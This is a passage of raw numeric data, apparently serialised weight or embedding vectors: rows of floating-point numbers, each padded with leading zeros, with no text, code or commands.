0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.7993, 0.00817, 0.05536, -0.5596, 0.4001, 0.3171, 0.11993, -0.08093, -0.4167, 0.32, 0.02162, 0.07654, 0.4783, 0.11835, -0.013756, 0.08716, -0.2229, 0.1212, 0.517, -0.1464, 0.4915, 0.5127, 0.06235, 0.1626, 0.01292, 0.0107, 1.174, -0.9463, -0.5176, -0.2281, -0.2041, -2.014, 0.2316, 0.3374, 0.5137, -0.2903, 0.02423, 0.0342, -2.148, 0.6284, 0.0631, 0.7075, -0.2659, 0.0099, 0.08685, -0.1298, 0.395, -0.208, 0.01955, 0.4277], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.008, -0.01277, -0.2325, 0.1593, 0.0391, 0.62, 0.51, 0.3071, 0.1608, -0.1466, 0.02486, 0.07965, 0.6147, 0.3535, 0.00747, -0.5933, -0.5283, -0.2009, -0.4412, 0.04062, -0.3826, -0.4075, 0.02136, 0.5, 0.01367, 0.005123, 0.389, -0.1714, -0.1798, -0.2605, 0.1692, -0.008995, 0.44, 0.51, 0.3928, 0.1066, -0.3943, 0.00815, -0.1882, -0.2664, 0.4985, 0.2732, 0.396, 0.04773, 0.405, 0.028, 0.3545, 1.044, 0.2017, 0.015366], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.737, -0.03494, -0.5933, -0.66, -0.06058, 0.1791, 0.02287, -0.725, -0.995, 0.1967, -0.0383, -0.535, -1.701, -0.3171, -0.6504, 0.6943, 0.2324, -0.4, -0.01306, -0.1824, -0.1428, 0.6924, -0.2435, -0.2861, 0.02672, -0.03111, -0.2686, -0.8223, 0.373, -0.752, -0.1176, -0.2795, -0.1987, 0.779, -0.3518, 0.4722, -1.005, 0.04892, -0.2113, 0.7656, 0.1531, -0.002611, -0.01464, -0.04324, 0.1993, -0.01371, 0.9707, -12.34, 0.00754, 
0.0892], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1453, 0.01854, 0.3923, 0.6836, -0.1678, 0.6177, -0.2617, 0.1656, 0.1225, -0.4084, 0.0266, 0.2515, 1.008, -0.1625, -0.0394, 0.5483, -0.1019, -0.4216, 0.02937, 0.1152, 0.1932, 0.2854, 0.2233, 0.1534, 0.05377, -0.03836, -0.302, -0.1741, 0.2988, 0.1582, 0.3877, -8.84, -0.4976, 0.134, 0.03497, 0.0324, -0.3123, 0.00454, -0.3806, 0.09485, -0.336, -0.7065, 0.06207, 0.02501, -0.1006, -0.4456, 0.01917, 1.216, 0.2603, -0.12335], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.05862, -0.03256, 0.02129, -0.127, 0.2488, 0.2593, 0.2065, 0.2537, 0.02733, -0.03897, 0.03278, -0.03738, 0.4595, 0.311, 0.1215, -0.2192, -0.1039, -0.4172, 0.2847, 0.05707, 0.05093, -0.11993, -0.1232, 0.0971, 0.014084, -0.0015335, -0.00955, 1.745, 0.03053, 0.0925, -0.1101, 0.4407, -0.1704, 0.11584, -0.1301, 0.2227, -0.2517, -0.037, 5.87, -0.2537, 0.1073, 0.021, 0.31, 0.01421, 0.299, 0.2131, 0.3857, 0.3115, 0.002504, 0.491], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.898, 0.003092, 0.1925, 0.8555, -0.7627, -0.1081, 0.1088, 0.732, -0.999, 0.2913, 0.003586, -0.004894, 1.03, -0.19, 1.104, 0.2988, 0.364, -0.1599, -0.3904, 0.3574, -0.771, 0.428, -0.0967, 0.3342, -0.05035, 0.03024, -0.12225, -0.002634, 0.4158, -0.0637, 0.1616, -0.3945, -0.4583, 0.01493, 0.7666, -0.8833, 0.972, 0.01167, -0.0779, 1.24, -1.176, -0.02649, -0.2695, -0.01264, -0.264, 
-0.9546, 0.79, -6.5, 0.3564, -0.9023], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2032, 0.03543, -0.1357, 1.726, -0.5605, 1.445, -0.315, -0.8184, -0.57, -0.3137, -0.000582, -0.06494, 0.2668, 0.4688, 0.001549, 0.2676, -0.3948, -0.1381, -0.6133, 0.2334, 0.2454, -0.03986, -0.5884, -0.385, -0.02878, 0.03476, 1.346, 0.1394, 0.2717, -0.1189, 0.4624, -1.076, 0.6274, 0.8755, 0.1892, -0.064, 0.6187, 0.04446, -0.8936, -0.3772, 0.5, 0.2534, -1.074, 0.037, -0.3083, 0.01949, -0.4973, -0.7944, -0.4993, -0.03336], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6323, 0.04126, -0.5405, -0.166, 0.2208, -0.129, 0.169, -0.9946, 0.1418, -0.2196, -0.0125, 0.1385, 0.163, 0.269, -0.5576, 0.2747, -0.993, -0.09186, 0.6157, -0.1791, 0.0966, 0.2198, -0.1456, -0.544, -0.02904, -0.01143, -0.2131, 0.1667, 0.0334, 0.172, -2.834, 0.3108, 0.001913, -0.4487, -0.4292, 0.011925, 0.2229, 0.02026, 0.1765, 0.2277, 0.4053, 0.01941, 0.37, -0.05362, -0.02168, -0.605, -0.1816, 0.1627, -0.1959, -0.004112], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2957, 0.01348, -0.07666, 1.555, -0.001569, -0.691, 0.3435, 0.7837, 0.1508, -0.2656, 0.04803, 0.4465, -0.6235, -0.9683, -0.3916, -0.1775, 1.598, -0.745, 1.022, -0.1311, 0.4844, -0.5024, -0.494, 0.7056, -0.001978, -0.0334, 1.205, -0.7886, 1.457, -0.2158, 0.2637, -0.48, -0.3433, -0.9736, 0.7266, 0.719, 0.4504, 0.03802, -0.4124, -0.714, 0.35, -0.6763, 
0.706, -0.002884, 0.2388, -0.0434, 0.8755, 0.3557, -0.647, -0.2693], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9253, 0.0348, 0.584, 2.627, 1.248, -0.235, 0.3167, 0.7275, 0.1993, -0.2166, 0.01019, 0.1487, -0.1104, -0.02403, 0.456, -0.4905, 0.1962, 0.5464, -0.3525, 0.07837, 0.672, 0.6934, -0.008194, 0.1519, -0.01573, -0.03738, -1.631, 0.4172, 0.7153, -0.03818, 0.554, -1.795, -0.10785, -0.2688, -0.04968, 0.1462, -0.1361, 0.007294, 1.31, -0.874, 0.03436, 0.1335, -0.3555, 0.02731, -0.008385, -0.6045, -1.027, 0.03757, -0.0241, -0.223], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.528, 0.0383, -0.02628, -0.05588, 1.039, -0.0453, 0.6196, 0.388, 0.1963, 0.09955, 0.02509, -0.4756, 0.4944, 0.3667, -0.06018, -0.3262, 0.3208, -0.9146, -0.2375, -0.0937, -0.2119, -0.06903, -0.271, -0.2109, 0.003881, 0.01581, -0.3726, -0.571, -0.305, 0.4421, -0.089, 0.424, 0.1494, -0.1307, 0.694, 0.2183, -0.2808, 0.01955, -3.541, -1.06, 0.3032, 0.203, -0.79, -0.0379, 0.3887, 0.334, -0.5586, 0.9233, 0.003735, -0.02701], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6094, -0.02678, -0.58, 0.709, 1.541, 1.278, 1.193, -0.08527, -0.214, 0.136, 0.01802, -0.9297, 0.2454, 0.351, -0.528, 0.3125, -0.695, -0.8887, 0.9897, 0.0686, 0.5117, 0.7773, 0.4836, 0.5938, -0.01764, -0.00808, 0.4788, -0.2727, 0.9316, -1.088, -0.2289, 0.179, -0.209, -0.09705, -0.2222, -0.35, 0.3354, -0.03595, -1.125, 
0.0349, -0.04663, 0.5107, 0.0574, -0.0494, 0.4622, -0.568, 0.1456, -0.4482, -0.3901, -0.435], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0282, 0.0005665, -0.0332, 0.02216, -0.00849, -0.01807, -0.05658, -0.011955, 0.03278, 0.01187, -0.03857, -0.0315, -0.01868, -0.02452, -0.03091, -0.01176, -0.007603, 0.005684, -0.04776, -0.01852, -0.01683, -0.03253, -0.04123, 0.03574, 0.002924, -0.0178, 0.04385, 0.01848, -0.02194, -0.0255, -0.0324, -0.04935, 0.0099, -0.0401, -0.03247, -0.02129, -0.01941, -0.04, 0.00536, -0.02638, -0.00801, -0.02107, 0.00992, 0.04465, 0.03458, -0.011795, 0.03094, -0.0197, -0.02869, 0.02844], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4983, -0.002127, -0.3005, -1.309, -1.942, 0.2544, -0.145, -0.7695, -0.02939, 0.2058, -0.01935, 0.912, 0.396, -0.1094, -0.1659, 0.2197, -0.999, 1.002, 0.1532, 0.71, -0.356, 0.473, -0.1504, 0.907, -0.01087, -0.01564, -0.644, 0.0745, 1.924, 0.498, -0.02608, -0.833, 0.1395, -0.9297, -0.71, -0.9004, 0.3208, -0.001629, -0.10986, 0.4656, -0.423, 0.5312, 0.3835, 0.07336, 0.328, -0.499, 0.2393, -0.8813, 0.1594, -0.3604], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2654, -0.03072, 0.04626, -0.1818, 0.733, -0.1938, 0.282, -0.6997, 0.186, -0.0937, 0.02382, -0.09344, 0.265, -0.1776, 0.04202, 0.374, -0.173, 0.09283, 0.4395, -0.04654, -0.88, -0.4768, -0.07764, 0.1667, -0.0312, -0.0424, -0.414, -0.0679, 0.1307, -0.7485, 
0.2878, -1.12, 0.3315, -0.2693, -0.007122, 0.2625, -0.2085, 0.04272, -0.9316, 0.5796, -0.3015, -0.1572, 0.3655, -0.02365, 0.1337, 0.4016, -0.07587, -0.0967, 0.155, -0.2646], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.521, 0.0291, -2.018, -3.736, -4.047, -0.5625, -0.2, 1.403, -0.2512, 0.656, -0.004314, -0.7046, 0.846, -0.7935, 1.197, -1.7, 0.627, -0.7173, 0.141, 0.5586, 0.2988, -0.7905, -0.593, -1.091, 0.03778, 0.02849, -0.1432, 0.4824, 0.5854, 1.093, -0.4697, -5.973, -0.1721, -0.5776, 0.612, 1.225, 0.03918, -0.02153, -0.3364, -1.701, 1.576, 1.697, -1.111, -0.0397, 0.557, -0.536, 0.02213, 1.633, -0.6562, 1.04], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03955, -0.03262, -0.00406, -1.026, -0.1078, 0.1387, -0.00947, -2.805, -0.204, -0.776, 0.009476, -0.328, 0.6787, 0.576, -0.5586, -0.426, -1.62, 0.791, -0.1343, -0.916, 0.8013, -0.8604, 0.0842, -0.3242, 0.03488, -0.002249, -0.624, -0.9087, -0.3635, -0.3691, 0.6743, -2.988, -0.2145, 0.1516, -0.5376, -0.8994, 0.503, -0.0348, 0.4426, -1.175, 1.044, 0.02121, 0.7744, 0.02759, 0.6304, -0.435, 0.273, 1.037, -0.6772, -0.5703], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.7505, -0.02188, 0.0847, -0.704, -0.004856, 0.3054, -0.05856, -0.4907, 0.4746, 0.09644, 0.011505, 0.2412, -0.3826, 0.2231, -0.2312, 0.687, 0.3293, -0.03912, -0.3474, 0.341, -0.268, -0.534, 0.174, -0.3225, -0.04858, 0.02718, -0.5117, -0.1521, 
0.0744, -0.07275, -0.04813, -0.97, 0.0936, -0.0681, -0.2769, 0.0882, -0.1908, -0.005943, 0.6787, 1.277, -0.2067, 0.2413, -0.002035, 0.01537, 0.319, -0.3882, -0.2458, 0.1569, 0.1407, -0.4092], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.797, -0.01949, 0.3162, 0.2854, -0.1174, -0.06323, -0.2325, -0.4756, -0.1709, -0.3108, -0.0233, 0.1606, 0.06274, 0.2145, 0.418, 0.2323, 0.1975, 0.6455, 0.05466, 0.2297, -0.3052, -0.00451, 0.007298, 0.7285, -0.014084, 0.03111, -0.521, 0.3784, 0.3691, 0.0929, 0.2216, 0.572, 0.3027, 0.1768, 0.4546, -0.5254, 0.0874, 0.02293, 1.727, -0.2588, -0.6494, -0.4749, 0.2069, 0.04776, 0.3706, 0.0449, 0.1151, 1.011, 0.1676, 0.2678], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7524, -0.03763, 0.669, 0.653, 0.593, -0.561, 0.1302, 0.08514, 0.1631, -0.2242, -0.0183, 0.132, 0.2812, 0.154, 0.6606, 0.6465, 0.4214, -0.283, -0.1247, 0.1914, -0.6436, -0.7417, -0.11444, 0.1259, 0.02625, -0.03122, -0.5376, 0.1439, -0.257, 0.658, 0.566, 0.667, -0.03885, 0.1616, -0.452, -0.0419, -0.2234, -0.04456, 0.4285, 0.448, -0.10266, -1.022, -0.2488, 0.03796, 0.2476, -0.0889, -0.4744, -0.1445, 0.4956, -0.0968], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09515, -0.001873, -0.765, 0.178, -0.00285, -0.2583, 0.4202, 0.531, -0.29, -0.3047, -0.03217, -0.2695, 0.2455, 0.1412, -1.341, -0.648, -1.148, -0.2212, -0.4226, -0.05817, -0.09344, 0.5293, -0.0786, 0.368, 
-0.02373, -0.0345, 0.3813, -0.10974, 0.752, -1.33, -0.05765, -1.104, 0.1296, 0.08765, 0.2705, -0.6025, 0.3608, -0.02028, -0.001578, -0.7773, -0.10736, 0.375, -0.669, -0.04123, -0.0495, 0.02444, 0.1724, 0.7856, -0.1411, -0.352], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.254, 0.02422, -0.201, 0.12054, -0.618, -0.5977, 0.545, 0.2644, -0.1584, 0.2203, 0.01072, -0.874, -0.12317, -0.882, 0.179, -0.2803, -0.286, -0.2966, -1.25, -0.2169, -0.081, -0.3452, 0.03403, -0.3179, 0.02866, 0.0476, -0.2517, 0.3813, -0.3174, 0.2261, -0.1371, 0.0653, -0.0647, 0.442, -0.8384, 0.0562, 0.3525, -0.007298, 6.066, 0.0546, 0.02403, -0.175, -0.5527, -0.0186, 0.1888, 0.1512, 0.387, 0.1084, -0.1454, 1.021], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4644, -0.02095, -0.1615, 0.764, -0.4849, -0.3318, 0.1366, -0.602, 0.3318, 0.5728, -0.0233, 0.5723, 0.988, 1.07, 0.1798, -0.472, -0.6694, 0.2267, -0.005028, -0.4058, 0.777, 0.3765, 0.3435, 0.2087, 0.0234, 0.0006733, 0.605, 0.0779, -0.2847, 0.2822, -0.3242, 0.3062, -0.3198, -0.3545, -0.9053, 0.1458, 0.329, 0.01855, 1.044, -0.2908, -0.0862, -0.10144, 0.477, -0.02928, -0.3193, 0.5376, -0.05093, -0.4492, -0.4297, -0.471], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1076, -0.01496, -0.03592, -0.3726, 0.703, 0.7627, 0.358, 0.05032, -0.3823, -0.2603, -0.02632, 0.2812, 0.12177, 0.09357, -0.1971, 0.1252, 0.4004, -0.395, 0.566, 0.03607, 
-0.178, 0.138, -0.1934, 0.06024, 0.00832, 0.03198, -0.01704, -0.277, 0.4097, -0.06274, 0.02611, -0.08685, -0.10425, 0.11334, 0.1185, -0.4158, -0.1287, -0.00506, 4.17, -0.3252, -0.1927, 0.02325, -0.8735, 0.012596, 0.203, 0.09393, -0.234, -0.1027, 0.1587, 0.5376], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.78, 0.004604, -0.1078, 0.4133, 0.09503, -0.567, -0.00879, -0.04984, -0.1504, -0.3203, -0.03915, -0.2712, -0.3213, 0.3528, 0.2563, -0.01619, -0.361, 0.338, -0.265, -0.2998, -0.0254, -0.2544, 0.1553, -0.0992, -0.01369, -0.000656, 0.07623, -0.0703, -0.2854, -0.07733, 0.287, 0.2241, -0.1367, 0.08875, -0.4753, -0.3982, 0.1082, -0.0094, 0.636, -0.4675, 0.02032, -0.1013, 0.497, 0.0003057, 0.2532, 0.3525, 0.1912, -0.02339, -0.0936, 0.003767], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.907, -0.02007, -0.05423, 0.2566, -0.2737, -0.0816, -0.082, -0.6675, 0.0648, -0.371, -0.02077, 0.545, -0.04028, 0.0819, 0.2443, 0.9263, 0.000681, -0.05768, 0.011856, -0.03635, 0.2673, 0.438, -0.3647, -0.808, 0.00594, -0.02885, 0.4502, 0.452, 0.604, -0.3232, 0.09283, -0.7427, -0.246, -0.2983, 0.229, -0.0734, 0.1049, -0.02415, 0.7783, 0.569, 0.08234, 0.262, 0.0433, 0.05432, 0.03592, 0.2493, -0.658, -1.193, 0.0658, -0.1735], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05536, 0.009766, -0.9717, -0.3584, -1.043, 0.61, -0.2568, 0.0651, -0.6626, -0.1469, 0.02583, -0.3347, -2.209, 
-0.2593, 0.9316, 0.4534, -0.704, 0.786, -0.5356, -0.2156, 0.8477, 0.4456, 0.455, 0.4355, -0.0181, -0.02269, -0.4414, 0.2094, -0.1838, -0.3325, 1.498, -0.4236, -14.695, -0.3442, 0.5024, 1.067, 1.107, -0.02815, 0.1921, 1.0, -0.2554, 0.7593, 0.923, -0.0367, 1.122, -1.312, -0.4714, -4.652, 0.02724, -0.6855], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.234, 0.02931, 0.3328, 1.247, -0.7734, 0.1166, -0.5728, 0.2593, -0.3376, 0.1594, 0.002361, 0.05417, -0.94, 0.0436, 0.4548, 0.336, 1.421, -0.3606, 0.1462, -0.05222, -0.09314, 0.5947, 0.2747, 0.0928, 0.01611, 0.03326, -0.4028, 0.0339, 0.1879, -0.4045, 0.01599, 0.542, 0.4922, 0.4048, -0.5693, -0.4421, 0.1781, -0.01113, -0.224, 